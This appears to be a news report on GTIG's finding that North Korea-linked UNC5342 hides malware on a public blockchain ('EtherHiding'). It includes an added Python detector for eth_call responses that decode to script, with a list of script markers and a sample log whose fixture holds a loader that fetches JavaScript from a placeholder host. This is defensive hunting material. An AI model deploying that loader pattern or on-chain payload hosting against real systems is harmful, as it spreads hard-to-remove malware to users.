
Google Cloud Threat Intelligence Group (GTIG) said on the 17th that it had identified signs that the North Korea-linked hacker group UNC5342 used a new attack technique called "EtherHiding" to steal cryptocurrency and collect sensitive information. EtherHiding is a technique that hides malware commands and code on a decentralized public blockchain.

According to GTIG, UNC5342's recent attacks compromised victims' systems through a multi-stage malware infection process targeting multiple operating systems (OS), including Windows, macOS, and Linux. UNC5342 stored the malware used in the attacks on an immutable blockchain and retrieved it through read-only queries, which let the group anonymously maintain persistent command and control and change the payload (the remote-control program delivered to victims) flexibly as needed.
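The read-only retrieval described above is what a defender can look for: a contract read (JSON-RPC `eth_call`) whose returned value decodes to web script rather than to a number or address. The following is an added hunting example, not code from the article or from GTIG; the log format, hostnames and contract address are constructed placeholders, and the script markers are a heuristic assumption.

```python
from typing import Optional

# Heuristic markers suggesting a returned contract string is executable web script.
SCRIPT_MARKERS = ("eval(", "atob(", "createElement(", "<script", "http://", "https://")


def abi_encode_string(text: str) -> str:
    """ABI-encode a Solidity `string` return value (used here only to build the sample)."""
    raw = text.encode()
    padded = raw + b"\x00" * (-len(raw) % 32)
    return "0x" + (32).to_bytes(32, "big").hex() + len(raw).to_bytes(32, "big").hex() + padded.hex()


def abi_decode_string(hexdata: str) -> Optional[str]:
    """Decode an ABI-encoded dynamic string; return None if the data is not one."""
    try:
        buf = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
        offset = int.from_bytes(buf[:32], "big")
        length = int.from_bytes(buf[offset:offset + 32], "big")
        data = buf[offset + 32:offset + 32 + length]
        return data.decode("utf-8") if len(data) == length else None
    except (ValueError, UnicodeDecodeError):
        return None


def flag_etherhiding(events: list) -> list:
    """Return (src, dst, snippet) for read-only eth_call responses that decode to script-like text."""
    hits = []
    for ev in events:
        if ev.get("request", {}).get("method") != "eth_call":
            continue  # only read-only contract reads are of interest; transactions leave other traces
        result = (ev.get("response") or {}).get("result")
        if not isinstance(result, str):
            continue
        text = abi_decode_string(result)
        if text and any(marker in text for marker in SCRIPT_MARKERS):
            hits.append((ev["src"], ev["dst"], text[:60]))
    return hits


# Constructed proxy-log sample (placeholder hosts and contract address, not real indicators).
CONTRACT = "0x" + "ab" * 20
SAMPLE_LOG = [
    {"src": "ws-01", "dst": "rpc.example-chain.invalid",
     "request": {"jsonrpc": "2.0", "id": 1, "method": "eth_blockNumber", "params": []},
     "response": {"result": "0x1a2b3c"}},
    {"src": "ws-03", "dst": "rpc.example-chain.invalid",  # benign read returning a uint256
     "request": {"jsonrpc": "2.0", "id": 2, "method": "eth_call", "params": [{"to": CONTRACT, "data": "0x18160ddd"}, "latest"]},
     "response": {"result": "0x" + (1000).to_bytes(32, "big").hex()}},
    {"src": "ws-07", "dst": "rpc.example-chain.invalid",  # read whose result is a script loader
     "request": {"jsonrpc": "2.0", "id": 3, "method": "eth_call", "params": [{"to": CONTRACT, "data": "0x20965255"}, "latest"]},
     "response": {"result": abi_encode_string("var s=document.createElement('script');s.src='https://cdn.example.invalid/x.js';")}},
]
```

Only the third event is flagged: the decoded string carries script markers, while the numeric result of the second decodes to an empty string and is ignored.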

GTIG assessed, "It is concerning in that it suggests UNC5342 has secured a way to neutralize any attempt to block or disrupt their operations through the EtherHiding technique and to sustain their attacks."

Robert Wallace, consulting leader at Google Cloud Mandiant, said, "The development of such attack techniques shows that the threat landscape is intensifying," and added, "State-backed threat groups are using new technologies to distribute malware that can be easily modified for new operations in response to law enforcement actions."
